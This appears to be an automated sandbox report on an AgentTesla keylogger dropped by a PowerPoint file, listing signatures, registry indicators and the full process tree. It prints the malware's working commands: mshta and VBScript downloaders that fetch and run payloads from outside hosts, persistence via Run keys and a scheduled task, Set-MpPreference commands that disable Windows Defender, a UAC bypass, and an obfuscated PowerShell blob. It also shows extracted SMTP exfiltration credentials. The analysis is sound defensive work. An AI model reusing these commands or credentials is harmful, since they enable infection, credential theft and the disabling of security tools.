agenttesla | 9161bc0ac7fd107278182e5220134b057915525c78ef256713b9ef6a4ccab4b6

Analysis

max time kernel
90s
max time network
134s
platform
windows10_x64
resource
win10v20201028
submitted
15-03-2021 08:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9161bc0ac7fd107278182e5220134b057915525c78ef256713b9ef6a4ccab4b6.pps
Size

83KB
MD5

43d6c3f16b3af2b31f6db8cf8702b5c8
SHA1

51a1010f9b54cb916474d288694a8255809f7843
SHA256

9161bc0ac7fd107278182e5220134b057915525c78ef256713b9ef6a4ccab4b6
SHA512

20a5cbb63445b08e08f9cc03152a2577f4e8a7f19d899c0aaac4450199305529c1d9cacacb8193b863d4d7c278dee2e32a1ee9083dccb39fb0bee42476e4238f

Score

10^/10

agenttesla evasion keylogger persistence spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.privateemail.com
Port:
587
Username:
[email protected]
Password:
@damienzy.xyz2240

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
C:\Users\Public\bin.vbs	disable_win_def

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 13 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

MsHTa.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	2312	832	MsHTa.exe	POWERPNT.EXE
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4452	3512	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4488	3512	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4556	3512	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4684	3512	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4892	3512	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5040	3512	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3524	3512	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4080	3512	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1624	3512	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4188	3512	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4380	3512	powershell.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3968	3512	powershell.exe

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112

AgentTesla Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5944-174-0x0000000000400000-0x000000000044E000-memory.dmp	family_agenttesla
behavioral2/memory/5944-175-0x00000000004491DE-mapping.dmp	family_agenttesla

Blocklisted process makes network request 15 IoCs

Processes:

MsHTa.exeWScript.exePowershell.exe

flow	pid	process
30	2312	MsHTa.exe
32	2312	MsHTa.exe
34	2312	MsHTa.exe
36	2312	MsHTa.exe
37	2312	MsHTa.exe
39	2312	MsHTa.exe
41	2312	MsHTa.exe
42	2312	MsHTa.exe
44	2312	MsHTa.exe
46	2312	MsHTa.exe
48	2312	MsHTa.exe
49	2312	MsHTa.exe
51	444	WScript.exe
53	444	WScript.exe
59	1784	Powershell.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

MsHTa.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%[email protected]/p/277.html\"\", 0 : window.close\")"	MsHTa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\phulihoja = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).btfee)\|IEX\"\", 0 : window.close\")"	MsHTa.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run	MsHTa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\phulihoja = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).cutona)\|IEX\"\", 0 : window.close\")"	MsHTa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\dkkkksakdosexography = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%[email protected]/p/277.html\"\", 0 : window.close\")"	MsHTa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%[email protected]/p/277.html\"\", 0 : window.close\")"	MsHTa.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" WScript.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4168 2312 WerFault.exe MsHTa.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	WScript.exe

pid	pid_target	process	target process
4168	2312	WerFault.exe	MsHTa.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3508 schtasks.exe

pid	process
3508	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

208 taskkill.exe
4068 taskkill.exe

pid	process
208	taskkill.exe
4068	taskkill.exe

Modifies registry class 2 IoCs

Processes:

cmd.exeWScript.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	WScript.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

832 POWERPNT.EXE

pid	process
832	POWERPNT.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

WerFault.exepowershell.exepowershell.exepowershell.exePowershell.exePowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4168	WerFault.exe
4168	WerFault.exe
4168	WerFault.exe
4168	WerFault.exe
4168	WerFault.exe
4168	WerFault.exe
4168	WerFault.exe
4168	WerFault.exe
4168	WerFault.exe
4168	WerFault.exe
4168	WerFault.exe
4168	WerFault.exe
4168	WerFault.exe
4168	WerFault.exe
4168	WerFault.exe
4168	WerFault.exe
4452	powershell.exe
4488	powershell.exe
4556	powershell.exe
4556	powershell.exe
4452	powershell.exe
4452	powershell.exe
1784	Powershell.exe
1192	Powershell.exe
4452	powershell.exe
4684	powershell.exe
4684	powershell.exe
4488	powershell.exe
4488	powershell.exe
4684	powershell.exe
4556	powershell.exe
1192	Powershell.exe
1192	Powershell.exe
4892	powershell.exe
4892	powershell.exe
1784	Powershell.exe
1784	Powershell.exe
4684	powershell.exe
4488	powershell.exe
4556	powershell.exe
5040	powershell.exe
5040	powershell.exe
3524	powershell.exe
3524	powershell.exe
4892	powershell.exe
5040	powershell.exe
4892	powershell.exe
4892	powershell.exe
3524	powershell.exe
5040	powershell.exe
4080	powershell.exe
4080	powershell.exe
1624	powershell.exe
1624	powershell.exe
4188	powershell.exe
4380	powershell.exe
4188	powershell.exe
4380	powershell.exe
3524	powershell.exe
1192	Powershell.exe
1192	Powershell.exe
1784	Powershell.exe
1784	Powershell.exe
4380	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetaskkill.exeWerFault.exePowershell.exePowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	208	taskkill.exe
Token: SeDebugPrivilege	4068	taskkill.exe
Token: SeDebugPrivilege	4168	WerFault.exe
Token: SeDebugPrivilege	1192	Powershell.exe
Token: SeDebugPrivilege	1784	Powershell.exe
Token: SeDebugPrivilege	4452	powershell.exe
Token: SeDebugPrivilege	4488	powershell.exe
Token: SeDebugPrivilege	4556	powershell.exe
Token: SeDebugPrivilege	4684	powershell.exe
Token: SeDebugPrivilege	4892	powershell.exe
Token: SeDebugPrivilege	5040	powershell.exe
Token: SeIncreaseQuotaPrivilege	4452	powershell.exe
Token: SeSecurityPrivilege	4452	powershell.exe
Token: SeTakeOwnershipPrivilege	4452	powershell.exe
Token: SeLoadDriverPrivilege	4452	powershell.exe
Token: SeSystemProfilePrivilege	4452	powershell.exe
Token: SeSystemtimePrivilege	4452	powershell.exe
Token: SeProfSingleProcessPrivilege	4452	powershell.exe
Token: SeIncBasePriorityPrivilege	4452	powershell.exe
Token: SeCreatePagefilePrivilege	4452	powershell.exe
Token: SeBackupPrivilege	4452	powershell.exe
Token: SeRestorePrivilege	4452	powershell.exe
Token: SeShutdownPrivilege	4452	powershell.exe
Token: SeDebugPrivilege	4452	powershell.exe
Token: SeSystemEnvironmentPrivilege	4452	powershell.exe
Token: SeRemoteShutdownPrivilege	4452	powershell.exe
Token: SeUndockPrivilege	4452	powershell.exe
Token: SeManageVolumePrivilege	4452	powershell.exe
Token: 33	4452	powershell.exe
Token: 34	4452	powershell.exe
Token: 35	4452	powershell.exe
Token: 36	4452	powershell.exe
Token: SeDebugPrivilege	3524	powershell.exe
Token: SeIncreaseQuotaPrivilege	4684	powershell.exe
Token: SeSecurityPrivilege	4684	powershell.exe
Token: SeTakeOwnershipPrivilege	4684	powershell.exe
Token: SeLoadDriverPrivilege	4684	powershell.exe
Token: SeSystemProfilePrivilege	4684	powershell.exe
Token: SeSystemtimePrivilege	4684	powershell.exe
Token: SeProfSingleProcessPrivilege	4684	powershell.exe
Token: SeIncBasePriorityPrivilege	4684	powershell.exe
Token: SeCreatePagefilePrivilege	4684	powershell.exe
Token: SeBackupPrivilege	4684	powershell.exe
Token: SeRestorePrivilege	4684	powershell.exe
Token: SeShutdownPrivilege	4684	powershell.exe
Token: SeDebugPrivilege	4684	powershell.exe
Token: SeSystemEnvironmentPrivilege	4684	powershell.exe
Token: SeRemoteShutdownPrivilege	4684	powershell.exe
Token: SeUndockPrivilege	4684	powershell.exe
Token: SeManageVolumePrivilege	4684	powershell.exe
Token: 33	4684	powershell.exe
Token: 34	4684	powershell.exe
Token: 35	4684	powershell.exe
Token: 36	4684	powershell.exe
Token: SeIncreaseQuotaPrivilege	4488	powershell.exe
Token: SeSecurityPrivilege	4488	powershell.exe
Token: SeTakeOwnershipPrivilege	4488	powershell.exe
Token: SeLoadDriverPrivilege	4488	powershell.exe
Token: SeSystemProfilePrivilege	4488	powershell.exe
Token: SeSystemtimePrivilege	4488	powershell.exe
Token: SeProfSingleProcessPrivilege	4488	powershell.exe
Token: SeIncBasePriorityPrivilege	4488	powershell.exe
Token: SeCreatePagefilePrivilege	4488	powershell.exe
Token: SeBackupPrivilege	4488	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

POWERPNT.EXE

pid process

832 POWERPNT.EXE
832 POWERPNT.EXE

pid	process
832	POWERPNT.EXE
832	POWERPNT.EXE

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

POWERPNT.EXEMsHTa.execmd.exeWScript.exeWScript.exe

description	pid	process	target process
PID 832 wrote to memory of 2312	832	POWERPNT.EXE	MsHTa.exe
PID 832 wrote to memory of 2312	832	POWERPNT.EXE	MsHTa.exe
PID 2312 wrote to memory of 2964	2312	MsHTa.exe	cmd.exe
PID 2312 wrote to memory of 2964	2312	MsHTa.exe	cmd.exe
PID 2312 wrote to memory of 3508	2312	MsHTa.exe	schtasks.exe
PID 2312 wrote to memory of 3508	2312	MsHTa.exe	schtasks.exe
PID 2312 wrote to memory of 1784	2312	MsHTa.exe	Powershell.exe
PID 2312 wrote to memory of 1784	2312	MsHTa.exe	Powershell.exe
PID 2312 wrote to memory of 1784	2312	MsHTa.exe	Powershell.exe
PID 2312 wrote to memory of 1192	2312	MsHTa.exe	Powershell.exe
PID 2312 wrote to memory of 1192	2312	MsHTa.exe	Powershell.exe
PID 2312 wrote to memory of 1192	2312	MsHTa.exe	Powershell.exe
PID 2312 wrote to memory of 4068	2312	MsHTa.exe	taskkill.exe
PID 2312 wrote to memory of 4068	2312	MsHTa.exe	taskkill.exe
PID 2312 wrote to memory of 208	2312	MsHTa.exe	taskkill.exe
PID 2312 wrote to memory of 208	2312	MsHTa.exe	taskkill.exe
PID 2964 wrote to memory of 444	2964	cmd.exe	WScript.exe
PID 2964 wrote to memory of 444	2964	cmd.exe	WScript.exe
PID 444 wrote to memory of 4312	444	WScript.exe	WScript.exe
PID 444 wrote to memory of 4312	444	WScript.exe	WScript.exe
PID 4312 wrote to memory of 4404	4312	WScript.exe	WScript.exe
PID 4312 wrote to memory of 4404	4312	WScript.exe	WScript.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

WScript.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	WScript.exe

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\9161bc0ac7fd107278182e5220134b057915525c78ef256713b9ef6a4ccab4b6.pps" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:832

C:\Windows\SYSTEM32\MsHTa.exe
MsHTa HTTp://j.mp/asdimawxiwmawidwwdkiiwnawij
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2312

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\1.txt", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs
3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2964

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\SiggiaW.vbs"
4⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:444

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\bin.vbs"
5⤵
- Suspicious use of WriteProcessMemory
PID:4312

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\bin.vbs" /elevate
6⤵
- Checks whether UAC is enabled
- System policy modification
PID:4404

C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe
"C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).cutona)|IEX
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784

C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
4⤵
PID:5944

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""tutipajikhana"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%[email protected]/p/277.html""\"", 0 : window.close"\")
3⤵
- Creates scheduled task(s)
PID:3508

C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe
"C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).btfee)|IEX
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1192

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Excel.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4068

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im winword.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:208

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2312 -s 2452
3⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4168

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4452

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableBehaviorMonitoring $true
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4488

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableBlockAtFirstSeen $true
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableScriptScanning $true
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -SubmitSamplesConsent 2
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -MAPSReporting 0
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3524

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -HighThreatDefaultAction 6 -Force
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
PID:4080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -ModerateThreatDefaultAction 6
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
PID:1624

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -LowThreatDefaultAction 6
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
PID:4188

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -SevereThreatDefaultAction 6
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
PID:4380

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c $ijijinjnini='**$**46**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**02**$**56**$**07**$**97**$**45**$**07**$**57**$**47**$**27**$**16**$**47**$**35**$**d2**$**02**$**46**$**e6**$**56**$**66**$**56**$**44**$**e6**$**96**$**75**$**02**$**56**$**d6**$**16**$**e4**$**d2**$**02**$**56**$**36**$**96**$**67**$**27**$**56**$**35**$**d2**$**47**$**56**$**35**$**a0**$**56**$**36**$**27**$**f6**$**64**$**d2**$**02**$**56**$**37**$**c6**$**16**$**66**$**42**$**a3**$**d6**$**27**$**96**$**66**$**e6**$**f6**$**34**$**d2**$**02**$**46**$**e6**$**56**$**66**$**56**$**44**$**e6**$**96**$**75**$**02**$**56**$**d6**$**16**$**e4**$**d2**$**02**$**56**$**36**$**96**$**67**$**27**$**56**$**35**$**d2**$**07**$**f6**$**47**$**35**$**a0**$**46**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**02**$**f6**$**47**$**02**$**47**$**96**$**02**$**47**$**56**$**37**$**02**$**46**$**e6**$**16**$**02**$**56**$**36**$**96**$**67**$**27**$**56**$**37**$**02**$**56**$**86**$**47**$**02**$**07**$**f6**$**47**$**37**$**02**$**32**$**a0**$**56**$**36**$**27**$**f6**$**64**$**d2**$**02**$**46**$**27**$**f6**$**75**$**44**$**02**$**56**$**07**$**97**$**45**$**d2**$**02**$**13**$**02**$**56**$**57**$**c6**$**16**$**65**$**d2**$**02**$**22**$**56**$**27**$**16**$**77**$**97**$**07**$**35**$**96**$**47**$**e6**$**14**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**22**$**02**$**56**$**d6**$**16**$**e4**$**d2**$**02**$**86**$**47**$**16**$**07**$**76**$**56**$**27**$**42**$**02**$**86**$**47**$**16**$**05**$**d2**$**02**$**97**$**47**$**27**$**56**$**07**$**f6**$**27**$**05**$**d6**$**56**$**47**$**94**$**d2**$**47**$**56**$**35**$**a0**$**d7**$**a0**$**56**$**36**$**27**$**f6**$**64**$**d2**$**02**$**27**$**56**$**e6**$**96**$**16**$**47**$**e6**$**f6**$**34**$**02**$**56**$**07**$**97**$**45**$**d6**$**56**$**47**$**94**$**d2**$**02**$**86**$**47**$**16**$**07**$**76**$**56**$**27**$**42**$**02**$**86**$**47**$**16**$**05**$**d2**$**02**$**d6**$**56**$**47**$**94**$**d2**$**77**$**56**$**e4**$**02**$**02**$**02**$**02**$**a0**$**b7**$**02**$**92**$**92**$**27**$**56**$**e6**$**96**$**16**$**47**$**e6**$**f6**$**34**$**02**$**56**$**07**$**97**$**45**$**86**$**47**$**16**$**05**$**d2**$**02**$**86**$**47**$**16**$**07**$**76**$**56**$**27**$**42**$**02**$**86**$**47**$**16**$**05**$**d2**$**47**$**37**$**56**$**45**$**82**$**12**$**82**$**02**$**66**$**96**$**a0**$**22**$**27**$**56**$**46**$**e6**$**56**$**66**$**56**$**44**$**02**$**37**$**77**$**f6**$**46**$**e6**$**96**$**75**$**c5**$**47**$**66**$**f6**$**37**$**f6**$**27**$**36**$**96**$**d4**$**c5**$**37**$**56**$**96**$**36**$**96**$**c6**$**f6**$**05**$**c5**$**54**$**25**$**14**$**75**$**45**$**64**$**f4**$**35**$**c5**$**a3**$**d4**$**c4**$**b4**$**84**$**22**$**02**$**d3**$**02**$**86**$**47**$**16**$**07**$**76**$**56**$**27**$**42**$**a0**$**a0**$**46**$**e6**$**56**$**35**$**27**$**56**$**67**$**56**$**e4**$**02**$**47**$**e6**$**56**$**37**$**e6**$**f6**$**34**$**37**$**56**$**c6**$**07**$**d6**$**16**$**35**$**47**$**96**$**d6**$**26**$**57**$**35**$**d2**$**02**$**46**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**02**$**76**$**e6**$**96**$**47**$**27**$**f6**$**07**$**56**$**25**$**35**$**05**$**14**$**d4**$**d2**$**02**$**56**$**36**$**27**$**f6**$**64**$**d2**$**02**$**56**$**46**$**f6**$**d4**$**47**$**96**$**46**$**57**$**14**$**02**$**e6**$**f6**$**96**$**47**$**36**$**56**$**47**$**f6**$**27**$**05**$**b6**$**27**$**f6**$**77**$**47**$**56**$**e4**$**56**$**c6**$**26**$**16**$**e6**$**54**$**d2**$**02**$**46**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**02**$**37**$**37**$**56**$**36**$**36**$**14**$**27**$**56**$**46**$**c6**$**f6**$**64**$**46**$**56**$**c6**$**c6**$**f6**$**27**$**47**$**e6**$**f6**$**34**$**56**$**c6**$**26**$**16**$**e6**$**54**$**d2**$**02**$**56**$**57**$**27**$**47**$**42**$**02**$**76**$**e6**$**96**$**e6**$**e6**$**16**$**36**$**35**$**47**$**07**$**96**$**27**$**36**$**35**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**d2**$**02**$**56**$**57**$**27**$**47**$**42**$**02**$**76**$**e6**$**96**$**27**$**f6**$**47**$**96**$**e6**$**f6**$**d4**$**56**$**d6**$**96**$**47**$**c6**$**16**$**56**$**25**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**d2**$**02**$**56**$**57**$**27**$**47**$**42**$**02**$**e6**$**f6**$**96**$**47**$**36**$**56**$**47**$**f6**$**27**$**05**$**65**$**14**$**f4**$**94**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**d2**$**02**$**56**$**57**$**27**$**47**$**42**$**02**$**d6**$**56**$**47**$**37**$**97**$**35**$**e6**$**f6**$**96**$**47**$**e6**$**56**$**67**$**56**$**27**$**05**$**e6**$**f6**$**96**$**37**$**57**$**27**$**47**$**e6**$**94**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**d2**$**02**$**56**$**36**$**e6**$**56**$**27**$**56**$